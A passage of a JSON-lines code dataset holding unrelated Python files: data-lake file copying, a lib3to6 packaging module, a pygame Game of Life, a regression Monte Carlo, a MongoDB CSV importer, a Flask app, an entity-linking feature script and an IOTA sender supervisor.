mnt+\"/curated/internal/product/rgis/archive/\"\nfileName = \"RGISStoreLocations.csv\"\ntodaydate = datetime.now(tz=pytz.utc).astimezone(timezone('US/Pacific')).strftime('%Y-%m-%d')\nNewFileName = \"RGISStoreLocations\"+todaydate+\".csv\"\nFileLocation = \"wasbs://\"+STORAGE_CONTAINER+\"@\"+STORAGE_ACCOUNT_ENV\ncontainerfiles = dbutils.fs.ls(FileLocation)\nDLFiles = dbutils.fs.ls(DLLocation)\nfor file in containerfiles:\n if fileName in file.name:\n print(f'File {fileName} exists')\n #Archive the existing file in DL\n for DLfile in DLFiles:\n if fileName in DLfile.name:\n dbutils.fs.mv(DLLocation+fileName, DLLocationArchive+NewFileName)\n #Copy file from the container to DL\n dbutils.fs.cp(file.path, DLLocation)\n","sub_path":"C1-SIT3/mplk_automation/rgis/RGIS_Outbound_Store_Locations.py","file_name":"RGIS_Outbound_Store_Locations.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"238291805","text":"# This file is part of the lib3to6 project\n# https://gitlab.com/mbarkhau/lib3to6\n#\n# Copyright (c) 2019 Manuel Barkhau (mbarkhau@gmail.com) - MIT License\n# SPDX-License-Identifier: MIT\n\nimport os\nimport sys\nimport shutil\nimport tempfile\nimport typing as typ\nimport hashlib as hl\nimport pathlib2 as pl\n\nfrom . import transpile\nfrom . import common\n\n\nENV_PATH = str(pl.Path(sys.executable).parent.parent)\n\n\nPYTHON_TAG_PREFIXES = {\n 'py': \"Generic Python\",\n 'cp': \"CPython\",\n 'ip': \"IronPython\",\n 'pp': \"PyPy\",\n 'jy': \"Jython\",\n}\n\n\nCACHE_DIR = pl.Path(tempfile.gettempdir()) / \".lib3to6_cache\"\n\n\ndef eval_build_config() -> common.BuildConfig:\n # TODO (mb 2018-06-07): Get options from setup.cfg\n # python_tags = \"py2.py3\"\n # for argi, arg in enumerate(sys.argv):\n # if \"--python-tag\" in arg:\n # if \"=\" in arg:\n # python_tags = arg.split(\"=\", 1)[-1]\n # else:\n # python_tags = sys.argv[argi + 1]\n\n return {'target_version': \"2.7\", 'force_transpile': \"1\", 'fixers': \"\", 'checkers': \"\"}\n\n\ndef _ignore_tmp_files(src: str, names: typ.List[str]) -> typ.List[str]:\n if src.endswith(\"build\"):\n return names\n if src.endswith(\"dist\"):\n return names\n if src.endswith(\"__pycache__\"):\n return names\n return [name for name in names if name.endswith(\".pyc\")]\n\n\ndef init_build_package_dir(local_package_dir: common.PackageDir) -> common.PackageDir:\n output_dir = pl.Path(\"build\") / \"lib3to6_out\"\n try:\n output_dir.mkdir(parents=True)\n except Exception:\n # forgiveness > permission\n pass\n\n build_package_dir: common.PackageDir = {}\n\n for package, src_package_dir in local_package_dir.items():\n # TODO (mb 2018-08-25): Make sure src_package_dir is a\n # relative path.\n is_abs_path = pl.Path(src_package_dir) == pl.Path(src_package_dir).absolute()\n if is_abs_path:\n raise Exception(f\"package_dir must use relative paths, got '{src_package_dir}'\")\n\n build_package_subdir = output_dir / src_package_dir\n\n # TODO (mb 2018-08-25): As an optimization, we could\n # restrict deletion to files that we manipulate, in\n # other words, to *.py files.\n if build_package_subdir.exists():\n shutil.rmtree(build_package_subdir)\n\n shutil.copytree(src_package_dir, str(build_package_subdir), ignore=_ignore_tmp_files)\n\n build_package_dir[package] = str(build_package_subdir)\n\n return build_package_dir\n\n\ndef build_package(cfg: common.BuildConfig, package: str, build_dir: str) -> None:\n for root, _dirs, files in os.walk(build_dir):\n for filename in 
files:\n filepath = pl.Path(root) / filename\n if filepath.suffix != \".py\":\n continue\n\n with open(filepath, mode=\"rb\") as fh:\n module_source_data = fh.read()\n\n filehash = hl.sha1(module_source_data).hexdigest()\n cache_path = CACHE_DIR / (filehash + \".py\")\n\n if int(cfg['force_transpile']) or not cache_path.exists():\n try:\n fixed_module_source_data = transpile.transpile_module_data(\n cfg, module_source_data\n )\n except common.CheckError as err:\n err.args = (err.args[0] + f\" of file {filepath} \",) + err.args[1:]\n raise\n\n with open(cache_path, mode=\"wb\") as fh:\n fh.write(fixed_module_source_data)\n\n shutil.copy(cache_path, filepath)\n\n\ndef build_packages(cfg: common.BuildConfig, build_package_dir: common.PackageDir) -> None:\n CACHE_DIR.mkdir(exist_ok=True)\n\n for package, build_dir in build_package_dir.items():\n build_package(cfg, package, build_dir)\n\n\ndef fix(package_dir: common.PackageDir = None) -> common.PackageDir:\n if package_dir is None:\n package_dir = {\"\": \".\"}\n\n build_package_dir = init_build_package_dir(package_dir)\n build_cfg = eval_build_config()\n build_packages(build_cfg, build_package_dir)\n return build_package_dir\n","sub_path":"src/lib3to6/packaging.py","file_name":"packaging.py","file_ext":"py","file_size_in_byte":4134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"527710756","text":"import pgzrun # import the game library\nimport random # import the random library\n\nTILE_SIZE = 20 # size of each small tile, 20*20\nWIDTH = 30*TILE_SIZE # set the window width to 600\nHEIGHT = 30*TILE_SIZE # set the window height to 600\n\nCells = [] # 2D array, initially an empty list, stores the state value of each tile\nfor i in range(30): # iterate over rows\n row = [] # stores one row of data, initially an empty list\n for j in range(30): # iterate over columns\n x = random.randint(0, 1)\n if i==0 or i==29 or j==0 or j==29:\n x = 0 # cells on the boundary are 0\n row.append(x) # append the value to the row list\n Cells.append(row) # then append the row list to the 2D array Cells\n\nTiles = [] # 2D array, initially an empty list, holds the image info for all tiles\ndef updateTiles(): # rebuild the Tiles array from Cells\n for i in range(30):\n for j in range(30):\n if Cells[i][j]==0:\n tile = Actor('die.jpg') # initialize the image for a dead cell\n if Cells[i][j]==1:\n tile = Actor('live.jpg') # initialize the image for a live cell \n tile.left = j * TILE_SIZE # x coordinate of the tile's left edge\n tile.top = i * TILE_SIZE # y coordinate of the tile's top edge\n Tiles.append(tile) # add the current tile to the list\n\ndef draw(): # drawing module, runs every frame\n screen.clear() # clear the screen each frame before redrawing\n for tile in Tiles:\n tile.draw() # draw all tiles\n\ndef update(): # update module, runs every frame\n global Cells\n NewCells = [row[:] for row in Cells] # cell states for the next frame (copied, so updating it does not overwrite the current frame mid-pass)\n NeibourNumber = 0 # counts the number of live neighboring cells\n for i in range(1,29): # iterate over rows\n for j in range(1,29): # iterate over columns\n NeibourNumber = Cells[i-1][j-1] + Cells[i-1][j] + Cells[i-1][j+1] \\\n + Cells[i][j-1] + Cells[i][j+1] \\\n + Cells[i+1][j-1] + Cells[i+1][j] + Cells[i+1][j+1]\n # derive the next-frame cell state from the number of live neighbors\n if (NeibourNumber == 3):\n NewCells[i][j] = 1\n elif (NeibourNumber == 2):\n NewCells[i][j] = Cells[i][j]\n else:\n NewCells[i][j] = 0\n Cells = NewCells\n updateTiles() # update the Tiles array from Cells\n\npgzrun.go() # start the game","sub_path":"PygameZero/python游戏趣味编程代码/第11章/练习11-2.py","file_name":"练习11-2.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"352876067","text":"import numpy as np\nimport pprint\nimport pandas as pd\n#from sklearn import linear_model\nimport statsmodels.api as sm\n\nimport matplotlib.pyplot as plt\n\n#define my params\nslope = []\n\nintercept = []\n\n#start MC loop\n\nfor i in range(10000):\n\n\t#add noise\n\tX = np.arange(10) # [0, 1, ..., 9]\n\t\n\tX = X + np.random.rand(10)\n\t\n\tY = np.arange(10)\n\t\n\t#model goes here\n\t\n\tX = 
sm.add_constant(X)\n\tmodel = sm.OLS(Y,X)\n\tresults = model.fit()\n\t\n\t#get params out of model\n\n\tslope.append(results.params[1])\n\tintercept.append(results.params[0])\n\n#plot intercept and slope\n\nplt.scatter(intercept, slope, marker='.', alpha=0.1, c='r') # alpha must be a number; the string '.1' raises a TypeError\n\n#plt.hist(intercept)\n\n#plt.grid(True)\n#plt.semilogy()\nplt.title(\"intercept vs slope\")\nplt.xlabel(\"intercept\")\nplt.ylabel(\"slope\")\n\nplt.show()","sub_path":"example_mc_fit.py","file_name":"example_mc_fit.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"260081997","text":"'''Adds products in a csv file to a MongoDB database'''\n# lesson 05: Consuming APIs\n\n# Checklist:\n# Create a product db with attributes that reflect the contents of the csv file\n# Import all data in the csv files into your MongoDB implementation\n# Write queries to retrieve the product database\n# Write a query to integrate customer and product data\n# no errors from pylint\n# quantity_available of '0' is understood as 'not available'\n# Create a test_database.py\n\n# pylint: disable=too-many-statements\n# pylint: disable=invalid-name\n# pylint: disable=too-many-locals\n\nimport logging\nimport csv\nimport os\nfrom pymongo import MongoClient\n# Set up logger\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\nclass MongoDBConnection():\n    '''MongoDBConnection'''\n\n    def __init__(self, host='127.0.0.1', port=27017):\n        '''Initialize the connection settings; be sure to use the IP address, not the hostname, on local Windows'''\n        self.host = host\n        self.port = port\n        self.connection = None\n\n    def __enter__(self):\n        '''Open the MongoDB client connection'''\n        self.connection = MongoClient(self.host, self.port)\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        '''Close the connection'''\n        self.connection.close()\n\ndef import_data(directory_name, product_file, customer_file, rentals_file):\n    '''\n    Populate new MongoDB database using the three csv file inputs.\n    Returns two tuples (1) record count of # of products, customers, rentals\n    (2) count of any errors that occurred\n    '''\n    product_error, customer_error, rentals_error = 0, 0, 0\n    product_file_path = os.path.join(directory_name, product_file)\n    customer_file_path = os.path.join(directory_name, customer_file)\n    rentals_file_path = os.path.join(directory_name, rentals_file)\n\n    mongo = MongoDBConnection()\n    with mongo:\n        db = mongo.connection.media\n\n        # Create collections\n        products = db['products']\n        customers = db['customers']\n        rentals = db['rentals']\n\n        # Attempt to import product data file into MongoDB db, create product collection\n        try:\n            with open(product_file_path, encoding='utf-8-sig') as file:\n                reader = csv.DictReader(file)\n                for row in reader:\n                    add_product = {'p_id': row['p_id'],\n                                   'description': row['description'],\n                                   'product_type': row['product_type'],\n                                   'quantity_available': row['quantity_available']}\n                    try:\n                        products.insert_one(add_product) # Fixed to use correct method\n                        LOGGER.info('Product added!')\n                    except NameError:\n                        LOGGER.info('Error adding product to database')\n                        product_error += 1\n        except FileNotFoundError:\n            LOGGER.info('Product file not found.')\n            product_error += 1\n\n        # Attempt to import customer data into the MongoDB db, create customer collection\n        try:\n            with open(customer_file_path, encoding='utf-8-sig') as file:\n                reader = csv.DictReader(file)\n                for row in reader:\n                    add_customer = {'c_id': row['c_id'],\n                                    'name': row['name'],\n                                    'address': 
row['address'],\n                                    'phone_number': row['phone_number'],\n                                    'email': row['email']}\n                    try:\n                        customers.insert_one(add_customer)\n                        LOGGER.info('Customer added!')\n                    except NameError:\n                        LOGGER.info('Error adding customer to database')\n                        customer_error += 1\n        except FileNotFoundError:\n            LOGGER.info('Customer file not found.')\n            customer_error += 1\n\n        # Attempt to import rentals file into the MongoDB db, create rentals collection\n        try:\n            with open(rentals_file_path, encoding='utf-8-sig') as file:\n                reader = csv.DictReader(file)\n                for row in reader:\n                    add_rentals = {'r_id': row['r_id'],\n                                   'p_id': row['p_id'],\n                                   'c_id': row['c_id']}\n                    try:\n                        rentals.insert_one(add_rentals)\n                        LOGGER.info('Rentals added!')\n                    except NameError:\n                        LOGGER.info('Error adding rentals to database')\n                        rentals_error += 1\n        except FileNotFoundError:\n            LOGGER.info('Rentals file not found.')\n            rentals_error += 1\n\n        # Return the sum of each record type and the sum of each error in 2 tuples\n        record_count = (products.count_documents({}), customers.count_documents({}),\n                        rentals.count_documents({}))\n        fail_count = (product_error, customer_error, rentals_error)\n\n        return record_count, fail_count\n#\ndef show_available_products():\n    '''Return a dictionary of products listed as available'''\n    mongo = MongoDBConnection()\n    available_products = {}\n    with mongo:\n        db = mongo.connection.media\n        for each in db.products.find({'quantity_available': {'$gt': '0'}}):\n            # '$gt' selects documents whose field value is greater than the\n            # specified value, i.e. quantity above '0' means available\n            product_info = {'description': each['description'],\n                            'product_type': each['product_type'],\n                            'quantity_available': each['quantity_available']}\n            available_products[each['p_id']] = product_info\n\n    return available_products\n\ndef show_rentals(p_id):\n    '''Return a dictionary with info from users that have rented with the product id'''\n    mongo = MongoDBConnection()\n    rental_list = {}\n    with mongo:\n        db = mongo.connection.media\n        for each in db.rentals.find({'p_id': p_id}):\n            for pers in db.customers.find({'c_id': each['c_id']}):\n                rental_list[pers['c_id']] = {'name': pers['name'],\n                                             'address': pers['address'],\n                                             'phone_number': pers['phone_number'],\n                                             'email': pers['email']}\n\n\n    return rental_list\n\ndef clear_all():\n    '''Clears all database collections'''\n    mongo = MongoDBConnection()\n    with mongo:\n        db = mongo.connection.media\n\n        db.products.drop()\n        db.customers.drop()\n        db.rentals.drop()\n    LOGGER.info('Cleared all databases!')\n","sub_path":"students/chelsea_nayan/lesson07/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"499269972","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pickle\nimport matplotlib\nimport numpy as np\n\nzhfont= matplotlib.font_manager.FontProperties(fname=r'C:\\Windows\\Fonts\\simhei.ttf',size=14)\n\nif __name__ == '__main__':\n    with open('sumData.txt', 'r') as f:\n        sumOfCost_boys = float(f.readline())\n        sumOfCost_girls = float(f.readline())\n        sumOfDiscount = float(f.readline())\n        sumOfInvalidOrders = float(f.readline())\n        sumOfAidouOrders_boys = float(f.readline())\n        sumOfAidouOrders_girls = float(f.readline())\n        sumOfChangfenOrders_boys = float(f.readline()) # renamed: matches the boys/girls pairing used above\n        sumOfChangfenOrders_girls = float(f.readline())\n        maxCost_singleTime = float(f.readline())\n        maxCost_total = float(f.readline())\n        maxCostTotalCustomer = float(f.readline())\n        maxCountOfOrders = 
float(f.readline())\n maxCountOfOrdersCustomer = float(f.readline())\n\n f = open('ordersEachMonth', 'rb')\n ordersEachMonth = pickle.load(f)\n f.close()\n\n x = [str(k)+\"月份\" for k in ordersEachMonth.keys()]\n y = [ordersEachMonth[k] for k in \n ordersEachMonth.keys()]\n x.reverse()\n y.reverse()\n sns.set_style(\"darkgrid\")\n sns.set(font=\"simhei\")\n bar_plot = sns.barplot(x=x,y=y,\n palette=\"muted\")\n plt.show()\n\n f = open('ordersEachCustomer', 'rb')\n ordersEachCustomer = pickle.load(f)\n f.close()\n\n f = open('dataForEachFood_boys', 'rb')\n dataForEachFood_boys = pickle.load(f)\n f.close()\n\n x = [k for k in dataForEachFood_boys.keys()]\n y = [dataForEachFood_boys[k].count for k in \n dataForEachFood_boys.keys()]\n sns.set_style(\"darkgrid\")\n sns.set(font=\"simhei\")\n bar_plot = sns.barplot(x=y,y=x,\n palette=\"muted\")\n plt.xticks(rotation=0)\n plt.show()\n\n f = open('dataForEachFood_girls', 'rb')\n dataForEachFood_girls = pickle.load(f)\n f.close()\n\n f = open('costPartition', 'rb')\n costPartition = pickle.load(f)\n f.close()\n\n f = open('timePartition', 'rb')\n timePartition = pickle.load(f)\n f.close()\n \n with open('dormitoryPartition_orders', 'rb') as f:\n dormitoryPartition_orders = pickle.load(f)\n \n with open('dormitoryPartition_cost', 'rb') as f:\n dormitoryPartition_cost = pickle.load(f)","sub_path":"dataview.py","file_name":"dataview.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"465940449","text":"\n# coding: utf-8\n\n# In[7]:\n\nimport os\nimport sys\nimport argparse\nimport pickle\nimport math\nimport unicodedata\nimport pandas as pd\nimport numpy as np\n\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\nfrom nltk.corpus import stopwords\n\n\n# In[8]:\n\n# arguments\nindex_entpath = \"../indexes/entity_2M.pkl\"\nindex_reachpath = \"../indexes/reachability_2M.pkl\"\nindex_namespath = \"../indexes/names_2M.pkl\"\n\ntrain_ent_resultpath = \"../entity_detection/query-text/train.txt\"\ntrain_gold_ent_resultpath = \"../entity_detection/gold-query-text/train.txt\"\ntrain_rel_resultpath = \"../relation_prediction/results/topk-retrieval-train-hits-3.txt\"\n\nvalid_ent_resultpath = \"../entity_detection/query-text/valid.txt\"\nvalid_gold_ent_resultpath = \"../entity_detection/gold-query-text/valid.txt\"\nvalid_rel_resultpath = \"../relation_prediction/results/topk-retrieval-valid-hits-3.txt\"\n\n\n\n# In[9]:\n\ntokenizer = TreebankWordTokenizer()\nstopwords = set(stopwords.words('english'))\n\ndef tokenize_text(text):\n tokens = tokenizer.tokenize(text)\n return tokens\n\ndef www2fb(in_str):\n if in_str.startswith(\"www.freebase.com\"):\n return 'fb:%s' % (in_str.split('www.freebase.com/')[-1].replace('/', '.'))\n return in_str\n\ndef get_index(index_path):\n print(\"loading index from: {}\".format(index_path))\n with open(index_path, 'rb') as f:\n index = pickle.load(f)\n return index\n\ndef strip_accents(text):\n return ''.join(c for c in unicodedata.normalize('NFKD', text) if unicodedata.category(c) != 'Mn')\n\n\n# In[10]:\n\ndef get_query_texts(ent_resultpath):\n print(\"getting query text...\")\n lineids = []\n id2query = {}\n notfound = 0\n with open(ent_resultpath, 'r') as f:\n for line in f:\n items = line.strip().split(\" %%%% \")\n try:\n lineid = items[0].strip()\n queries = items[1:]\n # mid = items[2].strip()\n except:\n # print(\"ERROR: line does not have >2 items --> 
{}\".format(line.strip()))\n notfound += 1\n continue\n # print(\"{} - {}\".format(lineid, query))\n lineids.append(lineid)\n id2query[lineid] = queries\n print(\"notfound (empty query text): {}\".format(notfound))\n return lineids, id2query\n\ndef get_relations(rel_resultpath):\n print(\"getting relations...\")\n lineids = []\n id2rels = {}\n with open(rel_resultpath, 'r') as f:\n for line in f:\n items = line.strip().split(\" %%%% \")\n lineid = items[0].strip()\n rel = www2fb(items[1].strip())\n label = items[2].strip()\n score = items[3].strip()\n # print(\"{} - {}\".format(lineid, rel))\n if lineid in id2rels.keys():\n id2rels[lineid].append( (rel, label, score) )\n else:\n id2rels[lineid] = [(rel, label, score)]\n lineids.append(lineid)\n return lineids, id2rels\n\n\n# In[11]:\n\ndef find_ngrams(input_list, n):\n ngrams = zip(*[input_list[i:] for i in range(n)])\n return set(ngrams)\n\n\n# In[12]:\n\ndef pick_best_name(question, names_list):\n best_score = None\n best_name = None\n for name in names_list:\n score = fuzz.ratio(name, question)\n if best_score == None or score > best_score:\n best_score = score\n best_name = name\n\n return best_name\n\n\n# In[13]:\n\nrel_lineids, id2rels = get_relations(valid_rel_resultpath)\nent_lineids, id2queries = get_query_texts(valid_ent_resultpath) # ent_lineids may have some examples missing\ngold_ent_lineids, id2gold_query = get_query_texts(valid_gold_ent_resultpath) # ent_lineids may have some examples missing\n\n\n# In[15]:\n\ndef get_questions(datapath):\n print(\"getting questions...\")\n id2question = {}\n with open(datapath, 'r') as f:\n for line in f:\n items = line.strip().split(\"\\t\")\n lineid = items[0].strip()\n sub = items[1].strip()\n pred = items[2].strip()\n obj = items[3].strip()\n question = items[4].strip()\n # print(\"{} - {}\".format(lineid, question))\n id2question[lineid] = (sub, pred, question)\n return id2question\n\ndatapath = \"../data/SimpleQuestions_v2_modified/all.txt\"\nid2question = get_questions(datapath)\n\n\n# In[18]:\n\nnum_entities_fbsubset = 200000 # 2M - 1959820 , 5M - 1972702\nindex_ent = get_index(index_entpath)\nindex_reach = get_index(index_reachpath)\nindex_names = get_index(index_namespath)\n\n\n# In[24]:\n\ndef calc_tf_idf(question, query, cand_ent_name, cand_ent_count, num_entities, index_ent):\n query_terms = tokenize_text(cand_ent_name)\n doc_tokens = tokenize_text(question)\n common_terms = set(query_terms).intersection(set(doc_tokens))\n\n # len_intersection = len(common_terms)\n # len_union = len(set(query_terms).union(set(doc_tokens)))\n # tf = len_intersection / len_union\n tf = math.log10(cand_ent_count + 1)\n k1 = 0.5\n k2 = 0.5\n total_idf = 0\n for term in common_terms:\n df = len(index_ent[term])\n idf = math.log10( (num_entities + k1) / (df + k2) )\n total_idf += idf\n return tf * total_idf\n\ndef calc_idf(question, cand_ent_name, index_ent):\n query_terms = tokenize_text(cand_ent_name)\n doc_tokens = tokenize_text(question)\n common_terms = set(query_terms).intersection(set(doc_tokens))\n fix_terms = 80000\n total_idf = 0\n for term in common_terms:\n df = len(index_ent[term])\n if df > fix_terms:\n continue # too common term\n idf = math.log10( (fix_terms + 1) / (df + 1) )\n total_idf += idf\n return total_idf\n\n# In[26]:\n\nfrom collections import defaultdict\ndata = defaultdict(list)\n\nid2mids = {}\nHITS_TOP_ENTITIES = 100\nfor i, lineid in enumerate(rel_lineids):\n if i % 10000 == 0:\n print(\"line {}\".format(i))\n\n truth_mid, truth_rel, question = id2question[lineid]\n 
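# Candidate generation: use the predicted entity-span queries for this line,\n    # falling back to the raw question string when entity detection found none.\n    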
queries = id2queries[lineid]\n    if queries is None or len(queries) == 0:\n        queries = [question] # fall back to the raw question string; id2question maps to (sub, pred, question) tuples\n    C = []\n    C_pruned = []\n    C_tfidf_pruned = []\n\n    for query in queries:\n        query_text = query.lower() # lowercase the query\n        query_tokens = tokenize_text(query_text)\n        N = min(len(query_tokens), 3)\n        # print(\"lineid: {}, query_text: {}, relation: {}\".format(lineid, query_text, pred_relation))\n        # print(\"query_tokens: {}\".format(query_tokens))\n        for n in range(N, 0, -1):\n            ngrams_set = find_ngrams(query_tokens, n)\n            # print(\"ngrams_set: {}\".format(ngrams_set))\n            for ngram_tuple in ngrams_set:\n                ngram = \" \".join(ngram_tuple)\n                ngram = strip_accents(ngram)\n                # unigram stopwords have too many candidates so just skip over\n                if ngram in stopwords:\n                    continue\n                # print(\"ngram: {}\".format(ngram))\n                try:\n                    cand_mids = index_ent[ngram] # search entities\n                except:\n                    continue\n                C.extend(cand_mids)\n            # print(\"C: {}\".format(C))\n            if (len(C) > 0):\n                # print(\"early termination...\")\n                break\n        # print(\"C[:5]: {}\".format(C[:5]))\n\n    for mid in set(C):\n        if mid in index_reach.keys(): # PROBLEM: don't know why this may not exist??\n            count_mid = C.count(mid) # count number of times mid appeared in C\n            C_pruned.append((mid, count_mid))\n\n    for mid, count_mid in C_pruned:\n        if mid in index_names.keys():\n            cand_ent_name = pick_best_name(question, index_names[mid])\n            try:\n                truth_name = pick_best_name(question, index_names[truth_mid])\n            except:\n                continue\n            if cand_ent_name == truth_name: # if name is correct, we are good\n                data['name_match_label'].append(1)\n            else:\n                data['name_match_label'].append(0)\n\n            if mid == truth_mid:\n                data['true_label'].append(1)\n            else:\n                data['true_label'].append(0)\n            data['lineid'].append(lineid) # append, so the column stays aligned with the other per-row features\n            data['query'].append(query_text)\n\n            data['length_name'].append(len(tokenize_text(cand_ent_name)))\n            data['length_question'].append(len(tokenize_text(question)))\n            data['length_query'].append(len(query_tokens))\n            data['tf'].append(count_mid)\n            data['idf'].append(calc_idf(question, cand_ent_name, index_ent))\n            data['sques'].append(fuzz.ratio(cand_ent_name, question)/100.0)\n            data['squer'].append(fuzz.ratio(cand_ent_name, query_text)/100.0)\n            data['pques'].append(fuzz.partial_ratio(cand_ent_name, question)/100.0)\n            data['pquer'].append(fuzz.partial_ratio(cand_ent_name, query_text)/100.0)\n\n            C_tfidf_pruned.append((mid, cand_ent_name, data))\n    # print(\"C_tfidf_pruned[:10]: {}\".format(C_tfidf_pruned[:10]))\n\n    if len(C_tfidf_pruned) == 0:\n        continue\n\n    id2mids[lineid] = C_tfidf_pruned\n\nprint(\"done\")\n\n\n\ndf = pd.DataFrame(data)\ndf.to_pickle('df_valid_linking.pkl')\n\ny = df['true_label']\nprint(y.head())\nX = df.drop(['true_label', 'lineid', 'query'], axis=1) # keep only the numeric feature columns for the classifier\n#print(X.head())\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nlr = LogisticRegression(C=0.1)\nlr.fit(X, y)\n\nprint(lr.score(X, y))\nprint(lr.coef_)\nprint(lr.intercept_)\n\n#with open('linking_lr.pkl', 'wb') as f:\n#    pickle.dump(lr, f)\n\n\n\n","sub_path":"ferhan_simple_qa_rnn/entity_linking/cross_linking_data.py","file_name":"cross_linking_data.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"483439050","text":"from flask import Flask, render_template, json, request,redirect,session,jsonify\nimport utils\n\napp = Flask(__name__)\napp.secret_key = 'why would I tell you my secret key?'\n\n@app.route('/')\ndef main():\n    return render_template('index.html')\n\n@app.route('/save', methods=['POST','GET'])\ndef Save():\n    
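# Keep the submitted question in the session so the /AskMe endpoint can read it back.\n    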
session['query'] = request.form['inputName']\n    return redirect('/')\n\n@app.route('/AskMe', methods=['POST','GET'])\ndef AskMe():\n    # return render_template('answer.html')\n    # _question = request.form['inputName']\n    # answer = utils.query_string_direct(_question)\n    # return redirect('/')\n    # return render_template('signup.html')\n    query = ''\n    if session.get('query'):\n        query = session.get('query')\n    try:\n        # validate the received values\n        if query != '':\n            # All Good, let's call MySQL\n            answer = utils.get_query_results(query)\n            return json.dumps(answer)\n        else:\n            return json.dumps({'html':'Enter the required fields'})\n    except Exception as e:\n        return json.dumps({'error':str(e)})\n\nif __name__ == \"__main__\":\n    app.run(port=5002)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225704875","text":"'''\nMaster sender background task (daemon).\nIt starts a sender for each sequence in the config file as a child process\nand exits if any of them exits.\n'''\nimport logging\nimport time\nimport sys\nimport traceback\nimport os\nimport multiprocessing as mp\n\nfrom misc import param, get_sequences, git_short_hash, DelayObj\nfrom misc import refresh_recent_history, connect, record_current_environ_obj, call_stats_cleanup\nfrom sender_lib import sender_proc\n\nfrom logging.handlers import TimedRotatingFileHandler\n\nlogger = mp.get_logger()\n\n\ndef config_logging(level, logger):\n    logger.setLevel(level)\n    logging.Formatter.converter = time.gmtime # https://stackoverflow.com/questions/6321160/python-logging-how-to-set-time-to-gmt\n\n    consoleHandler = logging.StreamHandler()\n    consoleHandler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s - %(module)s - %(message)s'))\n    logger.addHandler(consoleHandler)\n\n    fname = \"sender_master.log\"\n    # rotating file log doesn't work with multiprocessing\n    # fileHandler = TimedRotatingFileHandler(\n    #     param(\"site_data_dir\", \"log_path\") + fname,\n    #     delay=True,\n    #     when=\"midnight\",\n    #     interval=1,\n    #     utc=True,\n    #     backupCount=5,\n    #     encoding=\"utf8\",\n    # )\n    fileHandler = logging.FileHandler(param(\"site_data_dir\", \"log_path\") + fname)\n    fileHandler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s - %(module)s - %(message)s'))\n    logger.addHandler(fileHandler)\n    logger.info(\"Master log file is {}\".format(fname))\n\nconfig_logging(logging.DEBUG, logger)\n\ndef record_current_environment():\n    env_dict = dict(\n        num_sequences=len(get_sequences()),\n        active_senders=sorted([p.name for p in mp.active_children()])\n    )\n    record_current_environ_obj(connect(), env_dict)\n    return env_dict\n\n\ndef main(seq_list):\n    logger.info(\"Starting Traveling IOTA SENDER master process for sequences: {}\".format(str(seq_list)))\n    logger.info(\"Git commit short hash: {}\".format(git_short_hash))\n    logger.info(\"Default IOTA node: {}\".format(param(\"iota_node\")))\n    # load_iri_version()\n\n    logger.info(\"Master sender process pid={pid}\".format(\n        pid=os.getpid()\n    ))\n\n    connect()\n\n    # refresh since beginning\n    refresh_recent_history(connect(), None)\n\n    mp.set_start_method(\"spawn\")\n\n    init_lock = mp.Lock() # to synchronize initialization of senders to avoid db locks\n    start_event = mp.Event()\n\n    for _seq in seq_list:\n        p = mp.Process(target=sender_proc, args=(_seq, init_lock, start_event), name=_seq, daemon=True)\n        p.start()\n\n    logger.info(\"MASTER: wait 1 min for child processes to unwrap....\")\n    time.sleep(60) # 
wait startup time\n    logger.info(\"MASTER: finish init phase, send start signal\")\n    start_event.set()\n    count_call_stats_cleanup = 0\n    try:\n        delayObj = DelayObj()\n        while True:\n            delayObj.holdon(15)\n\n            env = record_current_environment()\n            refresh_recent_history(connect(), 5) # five minutes back\n\n            if count_call_stats_cleanup % 100 == 0:\n                call_stats_cleanup(connect())\n            count_call_stats_cleanup += 1\n\n            active_senders = env[\"active_senders\"]\n            msg = \"Sender master: {num} active senders: {lst}\".format(\n                num=len(active_senders),\n                lst=str(active_senders)\n            )\n            logger.info(msg)\n            if len(active_senders) != env[\"num_sequences\"]:\n                logger.error(\"!!!!!!! Not all senders are active: leaving master process...\")\n                sys.exit(\"--------- Master sender process stopped\")\n\n    except KeyboardInterrupt:\n        logger.info(\"Master sender process interrupted by keyboard\")\n        logger.info(\"Leaving master process..\")\n\n    except:\n        exc_type, exc_value, exc_traceback = sys.exc_info()\n        tb_formatted = \"\".join(traceback.format_exception(exc_type, exc_value, exc_traceback))\n\n        logger.error(tb_formatted)\n        logger.critical(\"!!!!!!!!! Leaving master sender process..\")\n        sys.exit(\"Master sender stopped\")\n\n\nif __name__ == '__main__':\n    from argparse import ArgumentParser\n\n    parser = ArgumentParser()\n    parser.add_argument(\"--seq\", \"-s\", type=str, help=\"Sequence name\")\n    args = parser.parse_args()\n    seq_list = sorted(get_sequences())\n    if args.seq:\n        seq = args.seq.upper()\n        if seq not in seq_list:\n            sys.exit(\"Letter '{}' doesn't represent enabled sequence\".format(seq))\n        else:\n            seq_list = [seq]\n\n    